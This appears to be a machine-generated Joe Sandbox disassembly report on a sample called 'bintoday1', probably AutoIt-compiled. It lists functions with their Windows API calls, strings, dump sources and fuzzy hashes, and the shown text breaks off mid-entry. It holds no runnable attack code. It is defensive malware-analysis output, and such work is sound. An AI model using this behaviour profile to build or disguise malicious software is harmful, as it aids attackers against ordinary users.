Instruction Fuzzy Hash: 5F31A175A20249ABDB219BA0DC89FEF37BCEF88710F1041B6F515D61A0EB749745CB24

Function 00BFE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00BFE6B4

Part of subcall function 00BAE551: timeGetTime.WINMM(?,?,00BFE6D4), ref: 00BAE555

Sleep.KERNEL32(0000000A), ref: 00BFE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00BFE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00BFE727
SetActiveWindow.USER32 ref: 00BFE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00BFE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00BFE773
Sleep.KERNEL32(000000FA), ref: 00BFE77E
IsWindow.USER32 ref: 00BFE78A
EndDialog.USER32(00000000), ref: 00BFE79B

Strings

BUTTON, xrefs: 00BFE719

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: eb0dd3aac2c8ff3285a36a93186a0e0619c6bdd04ad93d2dd4a29fa227d6eb97
Instruction ID: 07b2eec794906c034d86d4e6d0401b46913411e76aaa3f72a0dec1376b386dea
Opcode Fuzzy Hash: eb0dd3aac2c8ff3285a36a93186a0e0619c6bdd04ad93d2dd4a29fa227d6eb97
Instruction Fuzzy Hash: 92219270210A08AFEB206F66ECCDB3D3BA9F754749B040465FA22835B1DBB1DC199B24

Function 00BFE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BFEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BFEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BFEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BFEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BFEAA7

Strings

status PlayMe mode, xrefs: 00BFEA58
play PlayMe, xrefs: 00BFEAA2
play PlayMe wait, xrefs: 00BFEA91
alias PlayMe, xrefs: 00BFEA36
open , xrefs: 00BFEA0C
close PlayMe, xrefs: 00BFEA6E, 00BFEA9B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 4353cb98b216335d26fbbff96d2c3b8e1111e1a08ac9a64cd877f1c7c95fe349
Instruction ID: 9de08610f6bdad633028d52ce1d8a4d5ff8b54c4b99e604c113920ec1aa497d0
Opcode Fuzzy Hash: 4353cb98b216335d26fbbff96d2c3b8e1111e1a08ac9a64cd877f1c7c95fe349
Instruction Fuzzy Hash: 8C115175A902197DDB20A7A5DC4AEFFAAFCEBD1F01F400579B911A30E1EAB04949C5B0

Function 00BF5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00BF5CE2
GetWindowRect.USER32(00000000,?), ref: 00BF5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00BF5D59
GetDlgItem.USER32(?,00000002), ref: 00BF5D69
GetWindowRect.USER32(00000000,?), ref: 00BF5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00BF5DCF
GetDlgItem.USER32(?,000003E9), ref: 00BF5DDD
GetWindowRect.USER32(00000000,?), ref: 00BF5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00BF5E31
GetDlgItem.USER32(?,000003EA), ref: 00BF5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00BF5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00BF5E67

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 6b94eb9b64df10e54091e90627ea65c574a12a525df08b863608249d2297fe3c
Instruction ID: 75af86844b3fa1ff09c296c22cf4900783f0592f97fb08a971fc1f824650bdf7
Opcode Fuzzy Hash: 6b94eb9b64df10e54091e90627ea65c574a12a525df08b863608249d2297fe3c
Instruction Fuzzy Hash: 28512E74A10609AFDB28CF68CD89BAEBBF5FB48300F108169F615E7690D7709E05CB50

Function 00BA8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BA8BE8,?,00000000,?,?,?,?,00BA8BBA,00000000,?), ref: 00BA8FC5

DestroyWindow.USER32(?), ref: 00BA8C81
KillTimer.USER32(00000000,?,?,?,?,00BA8BBA,00000000,?), ref: 00BA8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00BE6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BA8BBA,00000000,?), ref: 00BE69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BA8BBA,00000000,?), ref: 00BE69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BA8BBA,00000000), ref: 00BE69D4
DeleteObject.GDI32(00000000), ref: 00BE69E6

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1fe5f49bf84223bc1c205290914726e7562924f7c51ab481696b9cf259753264
Instruction ID: 953c48b2eff49b9fb7f0881936b53b23cf43adbdb262b2c0c2f1c91334b4aaab
Opcode Fuzzy Hash: 1fe5f49bf84223bc1c205290914726e7562924f7c51ab481696b9cf259753264
Instruction Fuzzy Hash: E461A930406640DFCB359F16C988B2DB7F1FB56362F1845ACE4429B9A0DBB5A891CF90

Function 00BA9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00BA9944: GetWindowLongW.USER32(?,000000EB), ref: 00BA9952

GetSysColor.USER32(0000000F), ref: 00BA9862

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 13b2b7cc3e676a7962731953950eef8d8f0e49a456215fd6d3f8d38d95b56082
Instruction ID: f5f192f43ba374db49637eb89f5fbb846919cce2e051e3d9e68d95178134465c
Opcode Fuzzy Hash: 13b2b7cc3e676a7962731953950eef8d8f0e49a456215fd6d3f8d38d95b56082
Instruction Fuzzy Hash: 4A418D31148640AADB309B399C85BBE3BE5EB17361F144695E9B28B1E1C7799C42EB10

Function 00BF96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00BDF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00BF9717
LoadStringW.USER32(00000000,?,00BDF7F8,00000001), ref: 00BF9720

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00BDF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00BF9742
LoadStringW.USER32(00000000,?,00BDF7F8,00000001), ref: 00BF9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00BF9866

Strings

Error: , xrefs: 00BF981D
Line %d:, xrefs: 00BF97A0
Line %d (File "%s"):, xrefs: 00BF978F
%s (%d) : ==> %s: %s %s, xrefs: 00BF984A
^ ERROR, xrefs: 00BF97FB

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 4d3a3fea24488e919842d3005aa2b57beec4817bf79cc6aec1c5e7edef4ecc66
Instruction ID: 1de2c3da2ba17839eca5e043671ea32799f2a89a9ffcd22ccbcd5c878eea2605
Opcode Fuzzy Hash: 4d3a3fea24488e919842d3005aa2b57beec4817bf79cc6aec1c5e7edef4ecc66
Instruction Fuzzy Hash: D2411A72804209AACF14EBE4DD86EFEB7B8AF15740F5040B9F60573092EB656F49CB61

Function 00BF06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00BF07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00BF07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00BF07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00BF0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00BF082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BF0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00BF083C

Strings

\IPC$, xrefs: 00BF0784
SOFTWARE\Classes\, xrefs: 00BF070E
\CLSID, xrefs: 00BF0724

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 5c73522eb5af03066f1d547f4a29720f9906fdafcf2cf1480c04c9fd0bbbecaf
Instruction ID: c07732ce4b9d4703884ae81db7df292284d3d1fa8208791783ba9e7173545006
Opcode Fuzzy Hash: 5c73522eb5af03066f1d547f4a29720f9906fdafcf2cf1480c04c9fd0bbbecaf
Instruction Fuzzy Hash: CC410872C2022DABDF21EBA4DC95DFDB7B8FF04750B0441A9E911A3161EB709E49CB90

Function 00C13C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C13C5C
CoInitialize.OLE32(00000000), ref: 00C13C8A
CoUninitialize.OLE32 ref: 00C13C94
_wcslen.LIBCMT ref: 00C13D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00C13DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C13ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C13F0E
CoGetObject.OLE32(?,00000000,00C2FB98,?), ref: 00C13F2D
SetErrorMode.KERNEL32(00000000), ref: 00C13F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C13FC4
VariantClear.OLEAUT32(?), ref: 00C13FD8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 497195daea1bf4e70389a219d8b91173fcb27e7e0b017f9a26d43c03bb881007
Instruction ID: d8215162291a7a7fa1700bfddb9a774b3dd61d7f9730fe2a1d8d1b7ff0a0fb56
Opcode Fuzzy Hash: 497195daea1bf4e70389a219d8b91173fcb27e7e0b017f9a26d43c03bb881007
Instruction Fuzzy Hash: 7DC168716083459FD700DF68C88496BB7E9FF8A748F00496DF98A9B250D730EE86DB52

Function 00C07A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C07AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C07B8F
SHGetDesktopFolder.SHELL32(?), ref: 00C07BA3
CoCreateInstance.OLE32(00C2FD08,00000000,00000001,00C56E6C,?), ref: 00C07BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C07C74
CoTaskMemFree.OLE32(?,?), ref: 00C07CCC
SHBrowseForFolderW.SHELL32(?), ref: 00C07D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C07D7A
CoTaskMemFree.OLE32(00000000), ref: 00C07D81
CoTaskMemFree.OLE32(00000000), ref: 00C07DD6
CoUninitialize.OLE32 ref: 00C07DDC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 1ef235ccafeec5e30d097223fc0c5ebd8912a68d7c0366b1e586ffa67f072c31
Instruction ID: 9fdfde5f1834ee7047af36279ed040774985a56f8f5e5312ab7228c68360c73b
Opcode Fuzzy Hash: 1ef235ccafeec5e30d097223fc0c5ebd8912a68d7c0366b1e586ffa67f072c31
Instruction Fuzzy Hash: F8C12C75A04209AFCB14DF64C888EAEBBF9FF48304B1485A9F815DB661D730EE45CB90

Function 00C2541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C25504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C25515
CharNextW.USER32(00000158), ref: 00C25544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C25585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C2559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C255AC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: acad9be595055620a136dfa7aa60bf7a5c20da1defc2b29e89f11f36b4c3bf24
Instruction ID: 4e3b33fbec8c6ce97aeb4f36ded5c56ae4810814f3700f2bf2ce988b949a4944
Opcode Fuzzy Hash: acad9be595055620a136dfa7aa60bf7a5c20da1defc2b29e89f11f36b4c3bf24
Instruction Fuzzy Hash: 2E61AD74900628AFDF20EF55EC84AFF7BB9EF09720F108155F925A7A90D7708A81DB60

Function 00BEFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BEFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 00BEFB08
VariantInit.OLEAUT32(?), ref: 00BEFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00BEFB3A
VariantCopy.OLEAUT32(?,?), ref: 00BEFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00BEFBA1
VariantClear.OLEAUT32(?), ref: 00BEFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 00BEFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BEFBCC
VariantClear.OLEAUT32(?), ref: 00BEFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BEFBE9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6acdb23913054691833feaa7937758db888328f86f2c5be4040e3ad85850a001
Instruction ID: 3af932fc5345bbb9fdc50c6733dfec2f5850338912f7323426651122e9cd485a
Opcode Fuzzy Hash: 6acdb23913054691833feaa7937758db888328f86f2c5be4040e3ad85850a001
Instruction Fuzzy Hash: E1415135A1021A9FCF10EF65DC94ABEBBF9EF48344F0080A5E915A7261D734E946CF90

Function 00BF9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00BF9CA1
GetAsyncKeyState.USER32(000000A0), ref: 00BF9D22
GetKeyState.USER32(000000A0), ref: 00BF9D3D
GetAsyncKeyState.USER32(000000A1), ref: 00BF9D57
GetKeyState.USER32(000000A1), ref: 00BF9D6C
GetAsyncKeyState.USER32(00000011), ref: 00BF9D84
GetKeyState.USER32(00000011), ref: 00BF9D96
GetAsyncKeyState.USER32(00000012), ref: 00BF9DAE
GetKeyState.USER32(00000012), ref: 00BF9DC0
GetAsyncKeyState.USER32(0000005B), ref: 00BF9DD8
GetKeyState.USER32(0000005B), ref: 00BF9DEA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 346a9d0e1a711b9ce90d07a71a759a9fe321528749c52c7e5d31eb529339a486
Instruction ID: a00684940e8f1b121e858c2ac6b40e7d59afaa66d806786cc4877a33fb312821
Opcode Fuzzy Hash: 346a9d0e1a711b9ce90d07a71a759a9fe321528749c52c7e5d31eb529339a486
Instruction Fuzzy Hash: C941A634504BCD69FF35966488443B9BEE0EF12344F1480EADBC6575C2DBA599CCC7A2

Function 00C1055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C105BC
inet_addr.WSOCK32(?), ref: 00C1061C
gethostbyname.WSOCK32(?), ref: 00C10628
IcmpCreateFile.IPHLPAPI ref: 00C10636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C106C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C106E5
IcmpCloseHandle.IPHLPAPI(?), ref: 00C107B9
WSACleanup.WSOCK32 ref: 00C107BF

Strings

Ping, xrefs: 00C10676

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8c5ebaec011d20f80f1d02413495bfe6af71700a1de5ab177ea5a807c3223fc6
Instruction ID: d295c591d86118c0717d4f08b3e861a1144a2595cb5771f55877ee2a91cec7fc
Opcode Fuzzy Hash: 8c5ebaec011d20f80f1d02413495bfe6af71700a1de5ab177ea5a807c3223fc6
Instruction Fuzzy Hash: 42919C356082019FD720DF15C889F5ABBE0AF45318F2485A9F4698B6A2C7B0EDC1DFD1

Function 00C18CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00C18CF3

Part of subcall function 00BF8E54: _wcslen.LIBCMT ref: 00BF8E77

_wcslen.LIBCMT ref: 00C18D4E
_wcslen.LIBCMT ref: 00C18D9C
_wcslen.LIBCMT ref: 00C18DDC
_wcslen.LIBCMT ref: 00C18E6E

Strings

stdcall, xrefs: 00C18DD6, 00C18DDB
cdecl, xrefs: 00C18D48, 00C18D4D
none, xrefs: 00C18E65, 00C18E6A
winapi, xrefs: 00C18D96, 00C18D9B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: f5d56f09935d4ff36984bcd94da399f54ce2c33ef34ab65dcd1ef92cab105f2d
Instruction ID: 51b58bc0675cef08cfe60d13405a8d6368547765831f3d2f0a7b9b9d76a67ed1
Opcode Fuzzy Hash: f5d56f09935d4ff36984bcd94da399f54ce2c33ef34ab65dcd1ef92cab105f2d
Instruction Fuzzy Hash: 1851A335A081169BCF14DF6CC9409FEB7E5BF66724B204269E825E72C5DB30DE88D790

Function 00C1372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00C13774
